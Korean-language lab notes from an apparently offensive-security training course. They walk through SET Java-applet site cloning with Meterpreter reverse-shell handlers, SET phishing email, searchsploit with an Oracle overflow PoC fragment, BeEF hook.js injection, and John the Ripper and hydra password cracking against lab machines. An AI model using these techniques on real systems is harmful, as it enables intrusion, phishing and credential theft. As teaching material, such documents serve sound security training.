Enter the number you want to use [1-3]: 2
[*] Okay! Using the one built into SET - be careful, self signed isn't accepted in newer versions of Java :(
1. Java Required
2. Google
3. Facebook
4. Twitter
5. Yahoo
set:webattack> Select a template:2
[*] Cloning the website: http://www.google.com
[*] This could take a little bit...
[*] Injecting Java Applet attack into the newly cloned website.
[*] Filename obfuscation complete. Payload name is: llOdplapGIWHnqh
[*] Malicious java applet website prepped for deployment
What payload do you want to generate:
Name: Description:
1) Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker
2) Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker
3) Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker
4) Windows Bind Shell Execute payload and create an accepting port on remote system
5) Windows Bind Shell X64 Windows x64 Command Shell, Bind TCP Inline
6) Windows Shell Reverse_TCP X64 Windows X64 Command Shell, Reverse TCP Inline
7) Windows Meterpreter Reverse_TCP X64 Connect back to the attacker (Windows x64), Meterpreter
8) Windows Meterpreter All Ports Spawn a meterpreter shell and find a port home (every port)
9) Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter
10) Windows Meterpreter Reverse DNS Use a hostname instead of an IP address and spawn Meterpreter
11) SE Toolkit Interactive Shell Custom interactive reverse toolkit designed for SET
12) SE Toolkit HTTP Reverse Shell Purely native HTTP shell with AES encryption support
13) RATTE HTTP Tunneling Payload Security bypass payload that will tunnel all comms over HTTP
14) ShellCodeExec Alphanum Shellcode This will drop a meterpreter payload through shellcodeexec
15) PyInjector Shellcode Injection This will drop a meterpreter payload through PyInjector
16) MultiPyInjector Shellcode Injection This will drop multiple Metasploit payloads via memory
17) Import your own executable Specify a path for your own executable
set:payloads>2
Select one of the below, 'backdoored executable' is typically the best. However,
most still get picked up by AV. You may need to do additional packing/crypting
in order to get around basic AV detection.
1) shikata_ga_nai
2) No Encoding
3) Multi-Encoder
4) Backdoored Executable
set:encoding>1
set:payloads> PORT of the listener [443]: <ENTER>
[*] Generating x86-based powershell injection code for port: 22
[*] Generating x86-based powershell injection code for port: 53
[*] Generating x86-based powershell injection code for port: 443
[*] Generating x86-based powershell injection code for port: 21
[*] Generating x86-based powershell injection code for port: 25
[*] Finished generating powershell injection bypass.
[*] Encoded to bypass execution restriction policy...
[-] Encoding the payload 4 times. [-]
[*] x86/shikata_ga_nai succeeded with size 314 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 341 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 368 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 395 (iteration=4)
[*] Apache appears to be running, moving files into Apache's home
***************************************************
Web Server Launched. Welcome to the SET Web Attack.
***************************************************
[--] Tested on Windows, Linux, and OSX [--]
[--] Apache web server is currently in use for performance. [--]
[*] Moving payload into cloned website.
[*] The site has been moved. SET Web Server is now listening..
[-] Launching MSF Listener...
[-] This may take a few to load MSF...
IIIIII dTb.dTb _.---._
II 4' v 'B .'"".'/|\`.""'.
II 6. .P : .' / | \ `. :
II 'T;. .;P' '.' / | \ `.'
II 'T; ;P' `. / | \ .'
IIIIII 'YvP' `-.__|__.-'
I love shells --egypt
Frustrated with proxy pivoting? Upgrade to layer-2 VPN pivoting with
Metasploit Pro -- learn more on http://rapid7.com/metasploit
=[ metasploit v4.9.3-2014071601 [core:4.9 api:1.0] ]
+ -- --=[ 1322 exploits - 717 auxiliary - 210 post ]
+ -- --=[ 346 payloads - 35 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
[*] Processing /root/.set/meta_config for ERB directives.
resource (/root/.set/meta_config)> use exploit/multi/handler
resource (/root/.set/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/root/.set/meta_config)> set LHOST 192.168.20.50
LHOST => 192.168.20.50
resource (/root/.set/meta_config)> set EnableStageEncoding false
EnableStageEncoding => false
resource (/root/.set/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (/root/.set/meta_config)> set LPORT 22
LPORT => 22
resource (/root/.set/meta_config)> exploit -j
[*] Exploit running as background job.
resource (/root/.set/meta_config)> use exploit/multi/handler
resource (/root/.set/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/root/.set/meta_config)> set LHOST 192.168.20.50
LHOST => 192.168.20.50
resource (/root/.set/meta_config)> set EnableStageEncoding false
EnableStageEncoding => false
resource (/root/.set/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (/root/.set/meta_config)> set LPORT 53
LPORT => 53
resource (/root/.set/meta_config)> exploit -j
[*] Exploit running as background job.
resource (/root/.set/meta_config)> use exploit/multi/handler
resource (/root/.set/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/root/.set/meta_config)> set LHOST 192.168.20.50
LHOST => 192.168.20.50
resource (/root/.set/meta_config)> set EnableStageEncoding false
[*] Started reverse handler on 192.168.20.50:22
[*] Starting the payload handler...
EnableStageEncoding => false
resource (/root/.set/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (/root/.set/meta_config)> set LPORT 443
LPORT => 443
resource (/root/.set/meta_config)> exploit -j
[*] Exploit running as background job.
resource (/root/.set/meta_config)> use exploit/multi/handler
[*] Started reverse handler on 192.168.20.50:53
[*] Starting the payload handler...
resource (/root/.set/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/root/.set/meta_config)> set LHOST 192.168.20.50
LHOST => 192.168.20.50
resource (/root/.set/meta_config)> set EnableStageEncoding false
EnableStageEncoding => false
resource (/root/.set/meta_config)> set ExitOnSession false
[*] Started reverse handler on 192.168.20.50:443
ExitOnSession => false
[*] Starting the payload handler...
resource (/root/.set/meta_config)> set LPORT 21
LPORT => 21
resource (/root/.set/meta_config)> exploit -j
[*] Exploit running as background job.
resource (/root/.set/meta_config)> use exploit/multi/handler
resource (/root/.set/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/root/.set/meta_config)> set LHOST 192.168.20.50
LHOST => 192.168.20.50
resource (/root/.set/meta_config)> set EnableStageEncoding false
EnableStageEncoding => false
resource (/root/.set/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (/root/.set/meta_config)> set LPORT 25
LPORT => 25
resource (/root/.set/meta_config)> exploit -j
[*] Started reverse handler on 192.168.20.50:21
[*] Starting the payload handler...
[*] Exploit running as background job.
msf exploit(handler) >
[*] Started reverse handler on 192.168.20.50:25
[*] Starting the payload handler...
(windows 7)
(필요하면) JAVA 설치(https://java.com/ko/download/ie_manual.jsp?locale=ko)
(주의) 시작
> 모든 프로그램
> java
> java 구성("Configure Java")
> 보안 탭
> 보안 레벨을 낮춘다.
"높음" 선택
예외 사항 사이트 등록
http://192.168.20.50
https://192.168.20.50
> 적용
Mozilla Firefox를 사용하여 접속한다.
http://192.168.20.50/
-> Java Selevet download 한다.
-> www.google.com 사이트로 포워딩 된다.
(Kali Linux)
[*] Started reverse handler on 192.168.20.50:21
[*] Starting the payload handler...
[*] Exploit running as background job.
msf exploit(handler) >
[*] Started reverse handler on 192.168.20.50:25
[*] Starting the payload handler...
[*] Sending stage (769536 bytes) to 192.168.20.202
[*] Meterpreter session 1 opened (192.168.20.50:443 -> 192.168.20.202:50752) at 2014-07-21 21:04:00 +0900
[*] Sending stage (769536 bytes) to 192.168.20.202
[*] Sending stage (769536 bytes) to 192.168.20.202
[*] Sending stage (769536 bytes) to 192.168.20.202
[*] Sending stage (769536 bytes) to 192.168.20.202
[*] Sending stage (769536 bytes) to 192.168.20.202
[*] Meterpreter session 2 opened (192.168.20.50:443 -> 192.168.20.202:50755) at 2014-07-21 21:04:03 +0900
[*] Meterpreter session 3 opened (192.168.20.50:25 -> 192.168.20.202:50758) at 2014-07-21 21:04:03 +0900
[*] Meterpreter session 4 opened (192.168.20.50:22 -> 192.168.20.202:50756) at 2014-07-21 21:04:03 +0900
[*] Meterpreter session 5 opened (192.168.20.50:21 -> 192.168.20.202:50759) at 2014-07-21 21:04:03 +0900
[*] Meterpreter session 6 opened (192.168.20.50:53 -> 192.168.20.202:50757) at 2014-07-21 21:04:03 +0900
<ENTER>
msf exploit(handler) > sessions -i
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 soldesk-PC\soldesk @ SOLDESK-PC 192.168.20.50:443 ->
192.168.20.202:50752 (192.168.20.202)
2 meterpreter x86/win32 soldesk-PC\soldesk @ SOLDESK-PC 192.168.20.50:443 ->
192.168.20.202:50755 (192.168.20.202)
3 meterpreter x86/win32 soldesk-PC\soldesk @ SOLDESK-PC 192.168.20.50:25 ->
192.168.20.202:50758 (192.168.20.202)
4 meterpreter x86/win32 soldesk-PC\soldesk @ SOLDESK-PC 192.168.20.50:22 ->
192.168.20.202:50756 (192.168.20.202)
5 meterpreter x86/win32 soldesk-PC\soldesk @ SOLDESK-PC 192.168.20.50:21 ->
192.168.20.202:50759 (192.168.20.202)
6 meterpreter x86/win32 soldesk-PC\soldesk @ SOLDESK-PC 192.168.20.50:53 ->
192.168.20.202:50757 (192.168.20.202)
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : SOLDESK-PC
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64 (Current Process is WOW64)
System Language : ko_KR
Meterpreter : x86/win32
meterpreter > quit
[*] Shutting down Meterpreter...
[*] 192.168.20.202 - Meterpreter session 1 closed. Reason: User exit
msf exploit(handler) > quit
[*] You have active sessions open, to exit anyway type "exit -y"
msf exploit(handler) > exit -y
Press [return] when finished.
[*] Everything has been moved over to Apache and is ready to go.
Press <return> to continue
[TERM2] 다른 터미널에서
# cd /var/www
# ls
<ENTER>
<ENTER>
set:webattack>99
set> 99
set> 99
-> 종료한다.
(정리) 이전의 작업과 비교해 보자
(이전 설정) ARP Spoofing + DNS Spoofing
(이전 설정) reverse_tcp(Backdoor)를 윈도우 PC에 직접 설치
(현재 설정) Fake Site + Java Applet
[실습] 칼리 리눅스 사용하기 7
● 이메일을 통해 속이는 작업(스팸 메일)을 해 보자.
# cd /usr/share/set/config
# vi set_config
#
### Set to ON if you want to use Email in conjunction with webattack
#
[수정전]
WEBATTACK_EMAIL=OFF
[수정후]
WEBATTACK_EMAIL=ON
-> 구글 메일외에 다른 메일도 사용할 수 있도록 하기 위해서 설정한다.
# setookit
..... (중략) .....
Select from the menu:
1) Social-Engineering Attacks
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Metasploit Framework
5) Update the Social-Engineer Toolkit
6) Update SET configuration
7) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
set> 1
..... (중략) .....
Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) SMS Spoofing Attack Vector
8) Wireless Access Point Attack Vector
9) QRCode Generator Attack Vector
10) Powershell Attack Vectors
11) Third Party Modules
99) Return back to the main menu.
set> 5
Social Engineer Toolkit Mass E-Mailer
There are two options on the mass e-mailer, the first would
be to send an email to one individual person. The second option
will allow you to import a list and send it to as many people as
you want within that list.
What do you want to do:
1. E-Mail Attack Single Email Address
2. E-Mail Attack Mass Mailer
99. Return to main menu.
set:mailer>1
set:phishing> Send email to:jang4sc@gmail.com
1. Use a gmail Account for your email attack.
2. Use your own server or open relay
set:phishing>1
set:phishing> Your gmail email address:jang4sc@gmail.com
set:phishing> The FROM NAME the user will see:Baik,SeoungChan
Email password: (이메일 암호 입력)
set:phishing> Flag this message/s as high priority? [yes|no]:no
set:phishing> Email subject:Hi, Student
set:phishing> Send the message as html or plain? 'h' or 'p' [p]:<ENTER>
[!] IMPORTANT: When finished, type END (all capital) then hit {return} on a new line.
set:phishing> Enter the body of the message, type END (capitals) when finished:<ENTER>
Next line of the body: Hi, Student
Next line of the body: This mail is test.
Next line of the body: http://192.168.20.50 /* 링크 주소가 반드시 필요하다. */
Next line of the body: END
[*] SET has finished sending the emails
Press <return> to continue
set> 99
set> 99
(window 7)
http://www.google.com
ID: (자신의 이메일)
PASS: (자신의 암호)
(에러메세지)
[실습] 칼리 리눅스 사용하기 8
● Exploit DB 사용하기(www.exploit-db.org)
Exploitation Tools > Explit Database > searchsploit
or
# searchsploit <검색단어> <검색단어> ...
# searchsploit
Usage: searchsploit [options] term1 [term2] ... [termN]
Example: searchsploit oracle windows local
=======
Options
=======
-c Perform case-sensitive searches; by default, searches will
try to be greedy
-h, --help Show help screen
-v By setting verbose output, description lines are allowed to
overflow their columns
*NOTES*
Use any number of search terms you would like (minimum of one).
Search terms are not case sensitive, and order is irrelevant.
# searchsploit oracle
Description Path
----------------------------------------------------------------------------- ----------------------------------
Oracle XDB FTP Service UNLOCK Buffer Overflow Exploit | /windows/remote/80.c
Oracle (oidldapd connect) Local Command Line Overflow Exploit | /linux/local/183.c
Oracle Database Server <= 10.1.0.2 - Buffer Overflow Exploit | /windows/local/932.sql
Oracle Database PL/SQL Statement Multiple SQL Injection Exploits | /windows/local/933.sql
Oracle 9.2.0.1 Universal XDB HTTP Pass Overflow Exploit | /windows/remote/1365.pm
Oracle Database Server 9i/10g (XML) Buffer Overflow Exploit | /windows/local/1455.txt
Oracle <= 10g Release 2 (DBMS_EXPORT_EXTENSION) Local SQL Exploit | /multiple/local/1719.txt
Oracle <= 9i / 10g (read/write/execute) Exploitation Suite | /multiple/remote/2837.sql
..... (중략) .....
Oracle Demantra 12.2.1 - SQL Injection Vulnerability | /windows/webapps/31993.txt
Oracle Demantra 12.2.1 - Stored XSS Vulnerability | /windows/webapps/31994.txt
Oracle Demantra 12.2.1 - Database Credentials Disclosure | /windows/webapps/31995.txt
Oracle VirtualBox 3D Acceleration - Multiple Vulnerabilities | /multiple/dos/32208.txt
Oracle Database Server <= 11.1 'CREATE ANY DIRECTORY' Privilege Escalation V | /multiple/remote/32475.sql
Oracle Identity Manager 11g R2 SP1 (11.1.2.1.0) - Unvalidated Redirects | /php/webapps/32670.txt
# searchsploit oracle | wc -l
197
# searchsploit oracle windows
..... (중략) .....
Oracle Java lookUpByteBI - Heap Buffer Overflow | /windows/dos/28050.txt
Oracle Java ShortComponentRaster.verify() Memory Corruption | /windows/remote/28331.txt
Oracle Outside In MDB - File Parsing Stack Based Buffer Overflow PoC | /windows/dos/31222.py
Oracle Forms and Reports - Remote Code Execution | /windows/remote/31737.rb
Oracle Demantra 12.2.1 - Arbitrary File Disclosure | /windows/webapps/31992.txt
Oracle Demantra 12.2.1 - SQL Injection Vulnerability | /windows/webapps/31993.txt
Oracle Demantra 12.2.1 - Stored XSS Vulnerability | /windows/webapps/31994.txt
Oracle Demantra 12.2.1 - Database Credentials Disclosure | /windows/webapps/31995.txt
# searchsploit oracle windows | wc -l
71
# searchsploit oracle windows local
----------------------------------------------------------------------------- ----------------------------------
Oracle Database Server <= 10.1.0.2 - Buffer Overflow Exploit | /windows/local/932.sql
Oracle Database PL/SQL Statement Multiple SQL Injection Exploits | /windows/local/933.sql
Oracle Database Server 9i/10g (XML) Buffer Overflow Exploit | /windows/local/1455.txt
Oracle 10g (PROCESS_DUP_HANDLE) Local Privilege Elevation (win32) | /windows/local/3451.c
Oracle 10/11g exp.exe - param file Local Buffer Overflow PoC Exploit | /windows/local/16169.py
Oracle 8/9i DBSNMP Oracle Home Environment Variable Buffer Overflow | /windows/local/21044.c
# cd /usr/share/exploitdb/platforms
# ls
aix bsdi_x86 immunix linux_mips openbsd sco_x86 webapps
android cfm ios linux_ppc openbsd_x86 sh4 win32
arm cgi irix linux_sparc osx solaris win64
asp freebsd java minix osx_ppc solaris_sparc windows
atheos freebsd_x86 jsp mips palm_os solaris_x86
beos freebsd_x86-64 lin_amd64 multiple php tru64
bsd generator lin_x86 netbsd_x86 plan9 ultrix
bsd_ppc hardware lin_x86-64 netware qnx unix
bsd_x86 hp-ux linux novell sco unixware
# cd windows/local
# ls
..... (중략) .....
16169.py
# vi 16169.py
#!/usr/bin/python
# Oracle 10/11g exp.exe - param file Local Buffer Overflow PoC Exploit
# Date found approx: 9/3/2010
# Software Link: http://www.oracle.com/technology/products/database/oracle10g/index.html
# Version: 10.x and 11g r1 (r2 untested)
# Tested on: Windows XP SP3 En
# Usage:
# $ORACLE_HOME\exp.exe system parfile=overflow_oracle_exp.txt
def banner():
print "\n\t| ------------------------------------- |"
print "\t| Oracle exp.exe code execution explo!t |"
print "\t| by mr_me - net-ninja.net ------------ |\n"
header = ("\x69\x6E\x64\x65\x78\x65\x73\x3D\x6E\x0D\x0A\x6C\x6F\x67\x3D\x72\x65\x73\x75"
"\x6C\x74\x73\x2E\x74\x78\x74\x0D\x0A\x66\x69\x6C\x65\x3D");
# aligned to edx
egghunter= ("JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIQvK1"
"9ZKO6orbv2bJgr2xZmtnulfePZPthoOHbwFPtpbtLKkJLo1eJJloPuKW9okWA");
..... (중략) .....
[실습] 칼리 리눅스 사용하기 9
● BeEF(비프) XSS 프레임워크: 사용자 권한 획득
BeEF(Browser Exploit Framwork)
● 사용자 웹 브라우저로 웹페이지를 읽을 때 자바 스크립트 형태로 동작하며, 사용자 PC의 정보 수집 부터 메타 스플로잇 모듈을 이용한 광범위한 공격까지 가능한 도구이다.
XSS(Cross Side Script) 취약점
● 웹에서 사용하는 클라이언트 스크립트인 자바스크립트, VB 스크립트, CSS, 에이젝스(Ajax)등을 통해 스크립트에 접근한 사용자들에 특정한 액션을 일으키게 하는 것을 의미한다.
● 특정한 액셕이라는 것은 악성 코드 유포나, 윔, 바이러스 배포등이 보통의 목적이다. 또한 사용자 정보를 수집할 수도 있다.
XSS 취약점(웹 애플리케이션의 모든 변수 입력값에 대한 테스트)의 분류
● (첫번째) Non-persistent(Reflected XSS)이메일, 메신저, 게시판 링크 기능등을 이용해 사용자를 유도하고, 사용자가 이를 클릭했을 경우 액션이 발생된다. 하지만 웹사이트에 저장이 되어 있지 않기 때문에 사용자들을 유도하려면 사용자의 클릭이 필요하다.
● (두번째) Persistent(Stored XSS) 게시판 작성자, 제목, 내용 부분등 공격자가 삽입할 수 있는 모든 부분에 스크립트를 삽입해 사용자를 유도하는 공격 기법이다. 보통 웹사이트(데이터베이스에 저장)에 남아 있기 때문에 많은 사용자들을 쉽게 유도할 수 있다.
Exploitation Tools
> BeFF XSS Framework
> beff
or
# beef-xss
# beef-xss
[*] Please wait as BeEF services are started.
[*] You might need to refresh your browser once it opens.
process already running.
beef-xss 명령어를 수행하면 웹페이지가 자동으로 뜨게 된다.
(http://127.0.0.1:3000/ui/authentication)
ID : beef
PASS: beef
① 접근할 페이지 임의로 생성
# service apache2 restart
[ ok ] Restarting web server: apache2 ... waiting .
# cd /var/www
# rm -rf /var/www/*
# vi index.html
<HTML>
<BODY>
<CENTER><H1> It works! </H1></CENTER>
<script src="http://192.168.20.50:3000/hook.js"></script>
<P>This is the default web page for this server.</P>
<P>The Web Server software is running but no content has been added, yet.</P>
</BODY>
</HTML>
-> <script> .... </script> 구문을 삽입한다.
-> 클라이언트에서 해당 페이지를 읽을 때 hook.js가 실행된다.
(windows 7)
Mozilla Firefox 브라우저를 사용한다.
http://192.168.20.50
-> 페이지를 확인한다.
(주의) Chrome Broswer/Firefox 통해 확인, '인터넷익스플러워'는 잘되지 않는다.
-> 클라이언트에서는 hook.js 파일이 실행 되었는지는 모른다.
<F11><F12>
(Kali Linux)
왼쪽 Hooked Browsers 메뉴을 확인하면 사용자의 IP 정보가 보인다.
왼쪽 Hooked Browsers 에서 192.168.20.202 선택한다.
오른쪽 commands 항목 중 Module Tree 선택하고
Social Engineering 선택하고
Google Phishing 선택하고
Execute 버튼 클릭한다.
(windows7)
변경된 웹페이지를 확인한다.
[실습] 칼리 리눅스 사용하기
패스워드 크랙(Crack)
- 오프라인(Offline) 암호 크랙 = 로컬(Local) 암호 크랙 (EX: John The Ripper)
- 온라인(Online) 암호 크랙 = 원격(Remote) 암호 크랙(EX: hydra)
● 오프라인(Offline) 패스워드 크랙(Crack)하기
● John The Ripper 툴을 사용해 보자
존더리퍼(John The Ripper) 실행하는 방법
Password Attacks > Offline Attacks > john
or
# john
[실습] Offline password crack(Local Password Crack)
사용시스템
- KaliLinux
- Metasploitable V2 Server
(Kali Linux)
# cat /etc/passwd | grep --color root
root:x:0:0:root:/root:/bin/bash
■ /etc/passwd 파일에 대한 해석
root 사용자 이름
:x place holder
:0 UID(User ID)
:0 GID(Group ID)
:root Comment
:/root Home Directory
:/bin/bash Login Shell
# ls -l /etc/passwd /etc/shadow
-rw-r--r-- 1 root root 2172 10월 2 19:21 /etc/passwd
-rw-r----- 1 root shadow 1448 10월 15 14:59 /etc/shadow
# cat /etc/shadow | grep --color root
root:$6$WEVVa8qf$Q9ERxWghMVy/KNq3xK9Ge7P.6dDpow0G8kT62W3DIcnCMC7ZOpX.i/SOuW0GHqPiN8YH1qfgOXoShMvsgORYb.:16258:0:99999:7:::
■ /etc/shadow 파일에 대한 해석
root 사용자 이름(User Name)
:$6$WEVVa8qf$Q9ERxWghMVy/KNq3xK9Ge7.....qfgOXoShMvsgORYb.
Password($암호화알고리즘$salt key$암호화된 암호)
:16258 Password Aging(Last Change) : 암호가 변경된 날짜(기준 1970.1.1)
:0 - (Min Change) : 암호를 변경할 수 없는 기간(EX: 7)
:99999 - (Max Change) : 암호를 사용할 수 있는 최대 날짜(EX: 30)
:7 - (WAN Date) : 경고 메세지를 출력하는 기간(EX: 7)
: - (Inactive) : 비활성화 기간(EX: 7)
: - (Expire Data): 암호를 사용할 수 있는 최대 날짜(EX: 2014.12.31)
: - (Reserved) :
# ls -l /etc/passwd /etc/shadow
-rw-r--r-- 1 root root 2213 7월 22 17:15 /etc/passwd
-rw-r----- 1 root shadow 1573 7월 22 17:15 /etc/shadow
# john
John the Ripper password cracker, ver: 1.7.9-jumbo-7_omp [linux-x86-sse2]
Copyright (c) 1996-2012 by Solar Designer and others
Homepage: http://www.openwall.com/john/
Usage: john [OPTIONS] [PASSWORD-FILES]
--config=FILE use FILE instead of john.conf or john.ini
--single[=SECTION] "single crack" mode
--wordlist[=FILE] --stdin wordlist mode, read words from FILE or stdin
--pipe like --stdin, but bulk reads, and allows rules
--loopback[=FILE] like --wordlist, but fetch words from a .pot file
--dupe-suppression suppress all dupes in wordlist (and force preload)
--encoding=NAME input data is non-ascii (eg. UTF-8, ISO-8859-1).
For a full list of NAME use --list=encodings
--rules[=SECTION] enable word mangling rules for wordlist modes
--incremental[=MODE] "incremental" mode [using section MODE]
--markov[=OPTIONS] "Markov" mode (see doc/MARKOV)
--external=MODE external mode or word filter
--stdout[=LENGTH] just output candidate passwords [cut at LENGTH]
--restore[=NAME] restore an interrupted session [called NAME]
--session=NAME give a new session the NAME
--status[=NAME] print status of a session [called NAME]
--make-charset=FILE make a charset file. It will be overwritten
--show[=LEFT] show cracked passwords [if =LEFT, then uncracked]
--test[=TIME] run tests and benchmarks for TIME seconds each
--users=[-]LOGIN|UID[,..] [do not] load this (these) user(s) only
--groups=[-]GID[,..] load users [not] of this (these) group(s) only
--shells=[-]SHELL[,..] load users with[out] this (these) shell(s) only
--salts=[-]COUNT[:MAX] load salts with[out] COUNT [to MAX] hashes
--pot=NAME pot file to use
--format=NAME force hash type NAME: afs bf bfegg bsdi crc32 crypt
des django dmd5 dominosec dragonfly3-32 dragonfly3-64
dragonfly4-32 dragonfly4-64 drupal7 dummy dynamic_n
epi episerver gost hdaa hmac-md5 hmac-sha1
hmac-sha224 hmac-sha256 hmac-sha384 hmac-sha512
hmailserver ipb2 keepass keychain krb4 krb5 lm lotus5
md4-gen md5 md5ns mediawiki mscash mscash2 mschapv2
mskrb5 mssql mssql05 mysql mysql-sha1 nethalflm netlm
netlmv2 netntlm netntlmv2 nsldap nt nt2 odf office
oracle oracle11 osc pdf phpass phps pix-md5 pkzip po
pwsafe racf rar raw-md4 raw-md5 raw-md5u raw-sha
raw-sha1 raw-sha1-linkedin raw-sha1-ng raw-sha224
raw-sha256 raw-sha384 raw-sha512 salted-sha1 sapb
sapg sha1-gen sha256crypt sha512crypt sip ssh
sybasease trip vnc wbb3 wpapsk xsha xsha512 zip
--list=WHAT list capabilities, see --list=help or doc/OPTIONS
--save-memory=LEVEL enable memory saving, at LEVEL 1..3
--mem-file-size=SIZE size threshold for wordlist preload (default 5 MB)
--nolog disables creation and writing to john.log file
--crack-status emit a status line whenever a password is cracked
--max-run-time=N gracefully exit after this many seconds
--regen-lost-salts=N regenerate lost salts (see doc/OPTIONS)
--plugin=NAME[,..] load this (these) dynamic plugin(s)
[참고] 사용자 추가하는 방법
(CentOS) # useradd user01 ; passwd user01
(Debian) # useradd -m -s /bin/bash user01 ; passwd user01
-m : make directory
-s : shell
# useradd -m -s /bin/bash user01
# passwd user01
새 UNIX 암호 입력: (user01)
새 UNIX 암호 재입력: (user01)
passwd: 암호를 성공적으로 업데이트했습니다
# useradd -m -s /bin/bash hacker
# passwd hacker
새 UNIX 암호 입력: (h4ckEr1.)
새 UNIX 암호 재입력: (h4ckEr1.)
passwd: 암호를 성공적으로 업데이트했습니다
hacker -> h4ckEr1. (hacker1.)
A -> 4
0 -> 0
l -> 1
# cd /root/bin
# unshadow /etc/passwd /etc/shadow > passwd.txt
# vi passwd.txt
root:$6$WEVVa8qf$Q9ERxWghMVy/KNq3xK9Ge7P.6dDpow0G8kT62W3DIcnCMC7ZOpX.i/SOuW0GHqPiN8YH1qfgOXoShMvsgORYb.:0:0:root:/root:/bin/bash
user01:$6$imj7YGai$xuWGmzdiO6wL3isEmuY4u8x0zMvmVykX0zevARtUPdlFiIu.wWg8kvvUiEvadJxkguQLCdYW1LBtz79nYMH0h.:1000:1001::/home/user01:/bin/sh
-> root 사용자와 user01 사용자를 제외한 모든 사용자의 정보를 삭제한다.
-> hacker 사용자에 대해서는 다른 파일을 하나더 만들어서 테스트하고 시간을 측정한다.
# john passwd.txt
Created directory: /root/.john
Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
Use the "--format=crypt" option to force loading these as that type instead
Loaded 2 password hashes with 2 different salts (sha512crypt [32/32])
toor (root)
user01 (user01)
guesses: 2 time: 0:00:00:00 DONE (Tue Jul 22 16:41:27 2014) c/s: 29.62 trying: user01 - toor
Use the "--show" option to display all of the cracked passwords reliably
■ 강력한 암호를 사용하는 방법
- 암호의 길이는 8글자 이상
- 문자(소문자/대문자)
- 숫자
- 특수기호(EX: $)
- 공백
[실습] hacker 사용자의 암호 크랙 실습
● 추가적인 실습으로 진행한다.
[과제] john the ripper 툴은 윈도우용 툴도 존재한다.
● 윈도우 용도로 되어 있는 툴을 사용해 본다.
# johnny
[과제] john the ripper 툴을 통해 dictionary file(user/password)를 통해 테스트 해 본다.
[과제] su 명령어를 사용하는 su crack 툴을 제작해 보자.
● 인터넷을 검색해 보자.
● (예) sucrack 툴
● (예) expect () && expect CMD + ssh CMD
[실습] 칼리 리눅스 사용하기
● 온라인(Online) 패스워드 크랙(Crack)하기
● xhydra(hydra-gtk), hydra 툴을 사용해 보자
xhydra 프로그램 실행하는 방법
Password Attacks > ONline Attacks > hydra-gtk (hydra)
or
# hydra
[실습] Online password crack(Remote password crack)
사용시스템
- KaliLinux (Attacker)
- Metasploitable V2 Server (Victim)
# nmap -sV -O -F 192.168.10.134 /* Metasploitable V2 Linux IP : 192.168.10.134 */
Starting Nmap 6.46 ( http://nmap.org ) at 2014-07-22 17:25 KST
Nmap scan report for 192.168.10.134
Host is up (0.00053s latency).
Not shown: 82 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
513/tcp open login?
514/tcp open tcpwrapped
2049/tcp open nfs 2-4 (RPC #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open vnc VNC (protocol 3.3)
6000/tcp open X11 (access denied)
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
MAC Address: 00:0C:29:FA:DD:2A (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: Host: metasploitable.localdomain; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.95 seconds
[참고] hydra
# hydra -l mfsadmin -P <암호 사전 파일> <타켓> <프로토콜>
or
# xhydra
# xhydra
-> 생성된 사전 파일을 가지고 작업한다.
-> 사전 파일을 생성하고 크랙하는 과정은 아래 [참고] 내용을 확인한다.
[참고] Kali Linux 서버에서 사전파일을 생성하고 FTP 통해 user1 사용자의 패스워드를 크랙한다.
(Metasploitable V2 Linux)
● 서버에서 아이디/패스가 쉬운 사용자(EX: user1)를 만든다.
(RedHat 계열) # useradd user1 ; passwd user1
